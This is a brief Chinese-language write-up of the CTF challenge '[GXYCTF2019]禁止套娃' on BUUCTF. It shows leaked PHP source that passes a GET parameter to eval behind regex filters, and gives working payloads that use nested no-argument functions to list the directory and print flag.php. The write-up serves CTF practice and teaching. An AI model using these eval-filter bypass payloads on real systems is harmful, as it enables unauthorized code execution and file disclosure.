BUUCTF [GXYCTF2019]禁止套娃 1

BUUCTF [GXYCTF2019]禁止套娃 1

• 扫目录发现.git目录，发现git源码泄露

include "flag.php";
echo "flag在哪里呢？
";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

• 爆出flag路径：?exp=print_r(scandir(pos(localeconv())));
• 用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出:?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); 得到flag